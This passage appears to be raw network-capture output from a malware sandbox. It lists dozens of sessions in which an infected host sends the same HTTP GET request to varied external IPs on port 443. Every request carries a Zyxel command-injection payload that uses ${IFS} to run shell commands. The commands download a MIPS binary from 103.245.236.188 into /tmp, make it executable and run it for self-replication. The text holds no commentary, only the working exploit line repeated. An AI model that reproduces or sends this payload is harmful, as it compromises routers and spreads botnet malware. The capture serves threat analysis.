                                                Jan 12, 2024 18:24:29.687726021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2903192.168.2.135518084.225.202.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687752962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2904192.168.2.1357092116.32.15.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687787056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2905192.168.2.134617627.112.163.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687845945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2906192.168.2.1340142145.23.150.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687891006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2907192.168.2.1356362210.206.182.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687927961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2908192.168.2.1334008144.228.253.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.687994957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2909192.168.2.135457471.216.59.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688010931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2910192.168.2.134527241.245.156.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688041925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2911192.168.2.1334646184.243.227.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688097000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2912192.168.2.133429457.103.79.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688123941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2913192.168.2.1355106135.141.121.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688170910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2914192.168.2.135134279.106.112.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688199043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2915192.168.2.133912058.216.231.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688251972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2916192.168.2.1356974120.14.60.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688297033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2917192.168.2.133291058.84.3.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688333035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2918192.168.2.1341214208.98.117.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688374043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2919192.168.2.1337472160.168.51.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688405037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2920192.168.2.1336200206.28.23.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688431025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2921192.168.2.1344970171.21.249.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688498974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2922192.168.2.134100094.200.138.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688522100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2923192.168.2.134689447.64.7.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688553095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2924192.168.2.1350346207.135.92.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688581944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2925192.168.2.1340294201.76.234.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688606024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2926192.168.2.1344504106.166.238.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688673019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2927192.168.2.1346116185.222.127.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688724041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2928192.168.2.1352452157.19.51.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688775063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2929192.168.2.133798074.227.132.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688802004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2930192.168.2.1338652199.69.88.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688821077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2931192.168.2.1345396168.175.164.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688868999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2932192.168.2.135186495.6.38.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688913107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2933192.168.2.1333756114.213.40.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.688966036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2934192.168.2.1356078140.185.239.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689012051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2935192.168.2.1358196222.57.85.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689060926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2936192.168.2.1343974150.155.3.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689095974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2937192.168.2.1340432120.112.88.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689131975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2938192.168.2.135533431.166.79.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689167023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2939192.168.2.1333186166.54.164.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689218998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2940192.168.2.136048469.129.90.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689270973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2941192.168.2.1355574194.160.53.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689287901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2942192.168.2.1336758181.236.81.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689318895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2943192.168.2.135854257.63.92.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689357996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2944192.168.2.1348490218.111.136.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689394951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2945192.168.2.134221477.1.28.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689416885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2946192.168.2.133312480.188.230.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689467907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2947192.168.2.135862442.218.99.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689515114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2948192.168.2.1340836136.165.183.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689536095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2949192.168.2.134409839.160.40.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689588070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2950192.168.2.135183642.185.161.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689623117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2951192.168.2.1350456110.57.87.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689661980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2952192.168.2.1336356198.150.158.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689718962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2953192.168.2.135167453.23.74.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689750910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2954192.168.2.1358190173.105.219.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689816952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2955192.168.2.133969814.6.29.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689882994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2956192.168.2.1333404220.220.62.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.689941883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2957192.168.2.134139457.160.181.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690001011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2958192.168.2.1332922112.207.252.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690030098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2959192.168.2.1333702102.158.104.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690084934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2960192.168.2.134728685.104.18.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690148115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2961192.168.2.1337136203.241.108.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690182924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2962192.168.2.133327440.223.129.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690249920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2963192.168.2.1353634216.157.155.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690361977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2964192.168.2.1348510213.137.104.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:29.690396070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2965192.168.2.133968457.183.122.246443
                                                TimestampBytes transferredDirectionData
